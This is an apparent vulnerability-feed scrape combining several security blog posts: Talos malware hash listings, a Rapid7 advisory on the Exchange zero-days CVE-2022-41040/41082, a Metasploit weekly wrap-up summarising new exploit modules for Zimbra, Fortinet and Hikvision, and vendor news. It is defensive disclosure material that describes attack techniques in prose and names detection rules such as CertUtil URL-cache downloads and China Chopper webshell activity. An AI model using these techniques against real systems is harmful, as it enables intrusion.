\n\n\n## Upcoming events where you can find Talos \n\n \n\n\n \n\n\n**_[GovWare 2022](<https://www.govware.sg/govware/2022/event-info>)_ (Oct. 
18 - 20)**\n\nSands Expo & Convention Centre, Singapore\n\n**_[Conference On Applied Machine Learning For Information Security](<https://www.camlis.org/>)_ (Oct. 20 - 21)**\n\nSands Capital Management, Arlington, Virginia\n\n**_[BSides Lisbon](<https://www.bsideslisbon.org/>)_ (Nov. 10 - 11)**\n\nCidade Universit\u00e1ria, Lisboa, Portugal\n\n## Most prevalent malware files from Talos telemetry over the past week\n\n**SHA 256:** [125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) \n**MD5:** 2c8ea737a232fd03ab80db672d50a17a \n**Typical Filename:** LwssPlayer.scr \n**Claimed Product:** \u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n**Detection Name:** Auto.125E12.241442.in02\n\n**SHA 256:** [e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>) \n**MD5:** 93fefc3e88ffb78abb36365fa5cf857c \n**Typical Filename:** Wextract \n**Claimed Product:** Internet Explorer \n**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg\n\n**SHA 256:** [1a234656f81e870cdeb0e648a6b305a41452c405cca21124de26b54f79d55ad0](<https://www.virustotal.com/gui/file/1a234656f81e870cdeb0e648a6b305a41452c405cca21124de26b54f79d55ad0/details>) \n**MD5:** 10f1561457242973e0fed724eec92f8c \n**Typical Filename:** ntuser.vbe \n**Claimed Product:** N/A \n**Detection Name:** Auto.1A234656F8.211848.in07.Talos\n\n**SHA 256:** [e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) \n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n**Typical Filename:** AAct.exe \n**Claimed Product:** N/A \n**Detection Name:** PUA.Win.Tool.Kmsauto::1201\n\n**SHA 256:** [63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f](<https://www.virustotal.com/gui/file/63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f/details>) \n**MD5:** a779d230c944ef200bce074407d2b8ff \n**Typical Filename:** mediaget.exe \n**Claimed Product:** MediaGet \n**Detection Name:** W32.File.MalParent", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 13, 2022) \u2014 Cybersecurity Awareness Month is all fun and memes until someone gets hurt", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41038"], "modified": "2022-10-13T18:00:00", "id": "TALOSBLOG:E5CB52FAF6F4E4360A360412C9377097", "href": "http://blog.talosintelligence.com/2022/10/threat-source-newsletter-oct-13-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2022-10-14T19:25:39", "description": "\n\nOn Thursday, September 29, a Vietnamese security firm called GTSC [published information and IOCs](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on what they claimed was a pair of **unpatched** Microsoft Exchange Server vulnerabilities being used in attacks on their customers\u2019 environments dating back to early August 2022. The impact of exploitation, the firm said, is remote code execution. From the information released, both vulnerabilities appeared to be post-authentication flaws. 
According to GTSC, the vulnerabilities are being exploited to drop webshells on victim systems and establish footholds for post-exploitation behavior. \n\nMicrosoft [confirmed both zero-day vulnerabilities](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) late the evening of September 29, 2022 and said they were aware of \"limited, targeted attacks using the two vulnerabilities to get into users' systems.\" Tracked as CVE-2022-41040 and CVE-2022-41082, neither vulnerability has a patch as of September 30, but Microsoft indicated they're working on an accelerated timeline to release fixes.\n\n * CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability. \n * CVE-2022-41082 allows remote code execution (RCE) when PowerShell is accessible to the attacker.\n\nBoth vulnerabilities require an attacker to have authenticated network access for successful exploitation. The known attacks appear to be a variant of last year's infamous [ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>). **Note: **While attacks using these vulnerabilities have so far chained the two CVEs, it is entirely possible that either could be used alone, or chained with different vulnerabilities.\n\nSecurity researchers have [pointed out](<https://twitter.com/GossiTheDog/status/1575597075118497793>) that there are still plenty of Exchange Server installations not patched or improperly patched for [ProxyShell](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>), which gives attackers an easy way into systems that might otherwise be somewhat more resilient to this latest campaign. As of early September 2022, Rapid7 Labs observed up to **191,000 Exchange Servers exposed to the internet** via port 443. 
\n\n### Threat intelligence\n\nGTSC's [original blog has extensive details](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on the attacks they observed, including various IOCs, malware analysis, and MITRE ATT&CK mapping. \n\nOn September 30, Microsoft also [published additional information](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) on attacks they have observed using these vulnerabilities: \n\n\"MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\"\n\n### Mitigation\n\n_**NOTE: **Microsoft has revised the URL Rewrite rule from their mitigation guidance multiple times since this blog came out. Refer to their instructions for the latest guidance._\n\nBoth CVE-2022-41040 and CVE-2022-41082 are unpatched.** **In the absence of a patch, Microsoft has directed on-premises Exchange customers to apply a blocking rule in \u201cIIS Manager -> Default Web Site -> Autodiscover -> URL Rewrite -> Actions\u201d to block the known attack patterns. Organizations should apply the mitigation as Microsoft directs on an emergency basis. \n\n**Microsoft has [full step-by-step URL Rewrite (mitigation) instructions here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). 
**These instructions have been updated multiple times\u2014check Microsoft's info for the latest.\n\nMicrosoft has confirmed that the URL Rewrite instructions linked above are successful in breaking current attack chains. Authenticated attackers who can access PowerShell Remoting on vulnerable Exchange systems will be able to trigger RCE using CVE-2022-41082. Blocking the ports used for Remote PowerShell can limit these attacks. Therefore, on-premises Exchange customers should review and apply Microsoft's URL Rewrite Instructions **and** block exposed Remote PowerShell ports:\n\n * HTTP: 5985\n * HTTPS: 5986\n\nMicrosoft also \"strongly recommends\" Exchange Server customers [disable](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>) remote PowerShell access for non-admin users.\n\nMicrosoft has said explicitly that Exchange Online Customers do not need to take any action. Note, however, that organizations who use hybrid (a mix of on-prem and cloud) Exchange environments should follow on-prem guidance. See [Microsoft's official blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for more details. \n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41040 and CVE-2022-41082 with a remote vulnerability check available in the September 30, 2022 content-only release ( Jar UpdateID: 144473189). The check will identify whether Microsoft's recommended mitigations have been applied. Customers can also use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) or [Dynamic Asset Groups](<https://docs.rapid7.com/nexpose/working-with-asset-groups/>) to identify systems that have Exchange installed on them. 
\n\n**Note: **Microsoft has revised their recommended URL Rewrite rule several times since October 4. Our vulnerability check has been updated as of the **October 12, 2022 content-only** release to identify the improved mitigation in Microsoft's guidance. \n\nThe behavior described in GTSC's blog is similar to other attacks targeting Exchange over the past 18 months. Rapid7\u2019s InsightIDR and Managed Detection & Response (MDR) customers have detection coverage for currently known post-exploitation attacker behaviors, including but not limited to:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Suspicious Process - Exchange Server Spawns Process\n * Attacker Technique - CertUtil With URLCache Flag\n * Webshell - China Chopper Executing Commands\n * Suspicious Process - Executable Runs From C:\\Perflogs\n\nFor InsightIDR customers, we recommend reviewing the rule action and priority of these detection rules to confirm that they align with their security needs. As always, MDR customers are being actively monitored by the Rapid7 SOC. If suspicious activity is detected in your environment, you will be contacted by your customer advisor.\n\nWe will update this blog with further information, including coverage additions or enhancements, as needed.\n\n### Updates\n\n**September 30, 2022: **Microsoft has confirmed two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082, are being exploited in \"limited, targeted attacks.\" Microsoft has released mitigation guidance. Our engineering teams are investigating options to allow InsightVM and Nexpose customers to assess exposure to these vulnerabilities. InsightIDR customers have existing detection coverage. \n**[16:30 ET]** Updated information on newly released InsightVM and Nexpose vulnerability checks. 
\n\n**October 1, 2022: **Clarified wording and directions in _Mitigations _section, added a _Threat intelligence_ section with [Microsoft's analysis](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) of attacks using these vulnerabilities. \n\n**October 4, 2022: **Microsoft published updated mitigation guidance that includes an improvement to their URL Rewrite rule. The string contained in the recommended rule has been modified to be more effective. [Full instructions are here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Our researchers are evaluating whether adjustments to our existing vulnerability checks are required based on Microsoft\u2019s new guidance. \n\n**October 5, 2022: **Our vulnerability check for InsightVM and Nexpose customers will be updated to identify the improved mitigation in Microsoft's revised guidance; this update will go out in the October 5, 2022 content-only release.\n\n**October 11, 2022: **Microsoft made additional improvements to their URL Rewrite rule instructions on October 7 and October 8. Full details are in their [blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The vulnerabilities are still unpatched as of the October 11, 2022 Patch Tuesday release. \n\n**October 12, 2022: **Our engineering team has updated checks for these vulnerabilities in the October 12 content-only release. The updates look for the revised URL Rewrite rule in Microsoft's recommended mitigation guidance. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-29T20:50:50", "type": "rapid7blog", "title": "CVE-2022-41040 and CVE-2022-41082: Unpatched Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-29T20:50:50", "id": "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "href": "https://blog.rapid7.com/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T18:06:13", "description": "## Zimbra with Postfix LPE (CVE-2022-3569)\n\n\n\nThis week [rbowes](<https://github.com/rbowes-r7>) added an LPE exploit for Zimbra with Postfix. The exploit leverages a vulnerability whereby the Zimbra user can run postfix as root, which in turn is capable of executing arbitrary shell scripts. This can be abused for reliable privilege escalation from the context of the `zimbra` service account to `root`. As of this time, this vulnerability remains unpatched.\n\n## Zimbra RCE (CVE-2022-41352)\n\n[rbowes](<https://github.com/rbowes-r7>) also added an RCE for Zimbra. This exploit can be used to remotely obtain the initial access necessary to exploit [CVE-2022-3569](<https://attackerkb.com/topics/GcH5KXsy1m/cve-2022-3569?referrer=blog>) and escalate privileges to root. 
This exploit leverages a path traversal vulnerability to write a malicious JSP file to the web directory, which yields code execution. The vulnerability does not require authentication; however, pax must not be present on the target for it to be exploitable. A Zimbra patch adds pax as a requirement, so either the patch must not have been applied or pax must have been explicitly removed.\n\n## FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)\n\nCommunity member [heyder](<https://github.com/heyder>) submitted an exploit for multiple Fortinet products this week. The exploit involves an authentication bypass that is leveraged to establish an SSH session with the target. Unfortunately, the FortiGate v7.2.1 instance used during testing indicated that the target could not be used for SSH port forwarding.\n\n## Improved Qualys Scan Import Performance\n\nMetasploit is capable of importing scan data produced by a variety of tools such as Qualys and Nessus. This week [jmartin](<https://github.com/jmartin-r7>) switched the XML parser used while processing Qualys scan files to obtain a dramatic performance improvement. 
Scan data that previously took hours to import now takes only a few minutes.\n\n## New module content (4)\n\n * [Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera](<https://github.com/rapid7/metasploit-framework/pull/17098>) by Monte Crypto and h00die-gr3y, which exploits [CVE-2017-7921](<https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921?referrer=blog>) \\- This adds an auxiliary module that leverages an authentication bypass vulnerability in Hikvision IP cameras (CVE-2017-7921) to disclose information such as detailed hardware and software configuration, user credentials, and camera snapshots.\n * [Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.](<https://github.com/rapid7/metasploit-framework/pull/17143>) by Heyder Andrade and Zach Hanley, which exploits [CVE-2022-40684](<https://attackerkb.com/topics/QWOxGIKkGx/cve-2022-40684?referrer=blog>) \\- This PR adds a remote code execution exploit module for CVE-2022-40684 affecting some Fortinet products.\n * [TAR Path Traversal in Zimbra (CVE-2022-41352)](<https://github.com/rapid7/metasploit-framework/pull/17114>) by Alexander Cherepanov, Ron Bowes, and yeak, which exploits [CVE-2022-41352](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352?referrer=blog>) \\- This adds a module that exploits a symlink-based path traversal vulnerability in `cpio` to get unauthenticated remote code execution as the `zimbra` user. This vulnerability is identified as CVE-2022-41352. 
The module generates a `.tar` file that will need to be emailed to any user on the target Zimbra server.\n * [Zimbra sudo + postfix privilege escalation](<https://github.com/rapid7/metasploit-framework/pull/17141>) by EvergreenCartoons and Ron Bowes, which exploits [CVE-2022-3569](<https://attackerkb.com/topics/GcH5KXsy1m/cve-2022-3569?referrer=blog>) \\- This adds a new module to exploit a vulnerable sudo configuration in Zimbra that permits the `zimbra` user to execute `postfix` as root. In turn, `postfix` can execute arbitrary shell scripts and get command execution as the root user. As of 2022-10-14, all versions of Zimbra are vulnerable.\n\n## Enhancements and features (4)\n\n * [#16982](<https://github.com/rapid7/metasploit-framework/pull/16982>) from [h00die](<https://github.com/h00die>) \\- Updates the Dell iDRAC login scanner to work with version 8 and version 9.\n * [#17135](<https://github.com/rapid7/metasploit-framework/pull/17135>) from [k0pak4](<https://github.com/k0pak4>) \\- This adds a proper namespace to the hash identification library to avoid any potential collision with the constants defined previously.\n * [#17140](<https://github.com/rapid7/metasploit-framework/pull/17140>) from [nfsec](<https://github.com/nfsec>) \\- The Metasploit Docker image's Alpine version has been bumped from 3.12 to 3.15.\n * [#17154](<https://github.com/rapid7/metasploit-framework/pull/17154>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- The process for importing Qualys scan data has been switched over from `REXML` to using `Nokogiri::XML` and XPath for improved performance.\n\n## Bugs fixed (1)\n\n * [#17157](<https://github.com/rapid7/metasploit-framework/pull/17157>) from [k0pak4](<https://github.com/k0pak4>) \\- A globally set LHOST option will now be properly respected when loading a module, whereas before only a globally set RHOST option was respected.\n\n## Get it\n\nAs always, you can update to the latest 
Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.22...6.2.23](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-10-12T21%3A51%3A32-05%3A00..2022-10-20T10%3A01%3A43-05%3A00%22>)\n * [Full diff 6.2.22...6.2.23](<https://github.com/rapid7/metasploit-framework/compare/6.2.22...6.2.23>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T17:31:54", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7921", "CVE-2022-3569", "CVE-2022-40684", "CVE-2022-41352"], "modified": 
"2022-10-21T17:31:54", "id": "RAPID7BLOG:061F409DE97071CC9A744DAF87C512FD", "href": "https://blog.rapid7.com/2022/10/21/metasploit-weekly-wrap-up-181/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-09T20:11:17", "description": "\n\n2022 began on a solemn note \u2014 many organizations across the globe were recovering from the [Log4Shell zero-day vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). For the InsightVM and Nexpose team, 2022 began with a lot of introspection on how we can add more value and keep meeting our customer needs in the best possible ways. This means we continue to prioritize what really matters, even if it means making some hard decisions, and further improve communication with our customers.\n\nOver the course of 2022, we launched many new features and improvements \u2014 some highly anticipated, many customer-requested. Log4j was difficult but we learnt from it to be quicker and better with our emergent threat response. [Rapid7 recently refreshed our coordinated vulnerability disclosure (CVD) policy and philosophy](<https://www.rapid7.com/blog/post/2022/12/28/refreshing-rapid7s-coordinated-vulnerability-disclosure-policy/>). As we ran into more edgy kinds of vulnerabilities, we learnt that we couldn't treat them all as equal and there is a need to be more agile with our CVD approach. So we came up with six classes of vulnerabilities (and a meta-classification of \"more than one\") and some broad strokes of what we intend to accomplish with our CVD for each of them.\n\nWe reimagined many of our internal processes and teams to drive better customer outcomes. 
For instance, we are making a significant investment in re-architecting the InsightVM/Nexpose database to ensure VM programs scale with customers' evolving IT environments.\n\nHere\u2019s a snapshot of 2022 in InsightVM:\n\n### Key Product Improvements\n\n**Agent-based policy assessment**\n\nA robust vulnerability management program should assess IT assets for misconfigurations along with vulnerabilities. That's why we were thrilled to introduce [Agent-Based Policy in InsightVM](<https://docs.rapid7.com/insightvm/assess-with-agent-based-policies/>). Customers can now use Insight Agents to conduct configuration assessments of IT assets against widely used industry benchmarks from the Center for Internet Security (CIS) and the U.S. Defense Information Systems Agency (DISA) to help prevent breaches and ensure compliance.\n\n**Remediation Project improvements**\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). [Here are our favorite updates](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>):\n\n * **Remediator Export -** a new solution-based CSV export option, Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution.\n * **Better way to track project progress -** The new metric that calculates progress for Remediation Projects will advance for each individual asset remediated within a \u201csolution\u201d group. This means customers no longer have to wait for all the affected assets to be remediated to see progress.\n\n**Scan Assistant**\n\n[Scan Assistant](<https://www.rapid7.com/globalassets/_pdfs/product-and-service-briefs/extend_vulnerability_coverage_scan_assistant.pdf>) provides an innovative alternative to traditional credentialed scanning. 
Instead of account-based credentials, it uses digital certificates, which increases security and simplifies administration for authenticated scans.\n\n * **Scan Assistant is now generally available for Linux**\n * **Automatic Scan Assistant credential generation -** taking some more burden off vulnerability management teams, customers can use the Shared Credentials management UI to automatically generate Scan Assistant credentials.\n * **Improved scalability -** automated Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants.\n\n**Dashboards and reports**\n\nCustomers like to use dashboards to visualize the impact of a specific vulnerability or vulnerabilities on their environment, and we made quite a few updates in that area:\n\n * **New dashboard cards based on CVSS v3 severity -** we [expanded CVSS dashboard cards](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) to include a version that sorts the vulnerabilities based on CVSS v3 scores (along with CVSS v2 scores).\n * **Threat feed dashboard includes CISA's KEV catalog -** we extended the scope of vulnerabilities tracked to [incorporate CISA's KEV catalog](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>) in the InsightVM Threat Feed Dashboard to help customers prioritize faster.\n * **5 New Dashboard Cards -** We launched a set of five new dashboard cards that utilize line charts to show trends in vulnerability severity and allow for easy comparison when reporting.\n * **Distribute Reports via Email -** Customers can now send InsightVM reports to their teammates through email.\n\n**Agent improvements for virtual desktops**\n\nThe pandemic fueled remote work and, with it, the use of virtual desktops. 
InsightVM can now identify [agent-based assets that are Citrix VDI](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) instances and correlate them to the user, enabling more accurate asset/instance tagging. This will create a smooth, streamlined experience for organizations that deploy and scan Citrix VDIs. Expect similar improvements for VMware Horizon VDIs in 2023.\n\n**Improved support**\n\nA new, opt-in feature eliminates the need for customers to attach logs to support cases and/or send logs manually, ensuring a faster, more intuitive support process.\n\n### Notable Emergent Threat Responses and Recurring Coverages\n\nIn 2022, we added support for enterprise systems like Windows Server 2022, AlmaLinux, VMware Horizon (server and client), and more to the recurring coverage list. Learn about the systems with [recurring coverage](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>).\n\nRapid7's Emergent Threat Response (ETR) program is part of an ongoing process to deliver fast, expert analysis alongside first-rate security content for the highest-priority security threats. This year we flagged a number of critical vulnerabilities. 
To list a few:\n\n * [Microsoft Exchange Server Server-Side Request Forgery](<https://www.rapid7.com/blog/post/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and Remote Code Execution (CVE-2022-41040 and CVE-2022-41082)\n * [OpenSSL Buffer Overflows](<https://www.rapid7.com/blog/post/2022/11/01/cve-2022-3786-and-cve-2022-3602-two-high-severity-buffer-overflows-in-openssl-fixed/>) (CVE-2022-3786 and CVE-2022-3602)\n * [Confluence Server and Data Center Unauthenticated Remote Code Execution](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) (CVE-2022-26134)\n * [Fortinet FortiOS Authentication Bypass](<https://www.rapid7.com/blog/post/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/>) (FortiGate, FortiProxy, FortiSwitch Manager) (CVE-2022-40684)\n\nThat's not all. We added over 21,000 new checks across close to 9000 CVEs to help customers understand their risk better and thus secure better.\n\nCheck out our past blogs - [Q1](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>), [Q2](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>), and [Q3](<https://www.rapid7.com/blog/post/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/>) \\- to get more information on product improvements and key vulnerability coverages.\n\n### Customer Stories and Resources\n\nThe past year, we had the privilege to share stories of how our customers are using Insight VM to secure their environment. 
[Check out how your peers are leveraging InsightVM](<https://www.rapid7.com/customers/customer-stories/?page=1&p=InsightVM>). Here's what one customer had to say:\n\n### \u201cThat is one of the things we value most about InsightVM; it has the capacity to pinpoint actively-exploited vulnerabilities, so we can prioritize and direct our attention where it's needed most.\u201d - _[Daniel Hernandez, Information Security Analyst III at Pioneer Telephone Cooperative, Inc](<https://www.rapid7.com/customers/pioneer-telephone-cooperative/>)._\n\nFor customers looking to improve the utilization of the Vulnerability Management tool, check out this webcast series that covers the different phases of the VM lifecycle - [Discovery](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/insightvm-customer-webcast-vulnerability-management-lifecycle-discovery>), [Analyze](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-analyze>), [Communicate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-communicate>), and [Remediate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-remediate>). Lastly, customers can always leverage [Rapid7 Academy to participate in workshops](<https://academy.rapid7.com/page/product-workshops#rapid7-product_insightvm>) and training to continue their learning journey.\n\n### Looking forward to 2023\n\nWe will maintain our customer-centricity in 2023 as we continue to deliver features and improvements in customers' best interests. We will be holding a [webinar](<https://information.rapid7.com/agent-based-policy-webinar-register.html>) on January 24 around configuration assessment in InsightVM agent-based policy. 
And, as always, be on the lookout for our annual vulnerability intelligence report coming soon to a Q1 near you ([here's last year's](<https://www.rapid7.com/info/2021-vulnerability-intelligence-report/>))!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-09T17:00:00", "type": "rapid7blog", "title": "Year in Review: Rapid7 Vulnerability Management", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-26134", "CVE-2022-3602", "CVE-2022-3786", "CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-09T17:00:00", "id": "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "href": "https://blog.rapid7.com/2023/01/09/year-in-review-vulnerability-management/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-20T22:06:00", "description": "![\\[Security Nation\\] James Kettle of PortSwigger on Advancing Web-Attack Research](https://blog.rapid7.com/content/images/2022/10/security_nation_logo.jpg)\n\nIn this episode of Security Nation, Jen and Tod talk to James Kettle of PortSwigger. 
Their discussion covers research into new web-attack techniques and how those get field tested (hint: bug bounties). The research is kept fresh by what is gleaned from those bug bounty field tests. PortSwigger validates its research in the real world, and those advances in web-attack techniques are published and disseminated in an effort to fix bugs and misconfigurations.\n\nStick around for the Rapid Rundown, where Tod and Jen talk about the recent Fortinet advisory concerning the \"silent patching\" of bugs without disclosure of any real details \u2013 only to have attackers go and reverse it all anyway. \n\n## James Kettle\n\n![\\[Security Nation\\] James Kettle of PortSwigger on Advancing Web-Attack Research](https://blog.rapid7.com/content/images/2022/10/Screen-Shot-2022-10-11-at-3.49.09-PM-2.png)\n\nJames 'albinowax' Kettle is Director of Research at PortSwigger. His latest work includes browser-powered desync attacks and web-cache poisoning. James has extensive experience cultivating novel attack techniques, including RCE via Server-Side Template Injection and abusing the HTTP Host header to poison password reset emails and server-side caches. James is also the author of various popular open-source tools including Param Miner, Turbo Intruder, and HTTP Request Smuggler. 
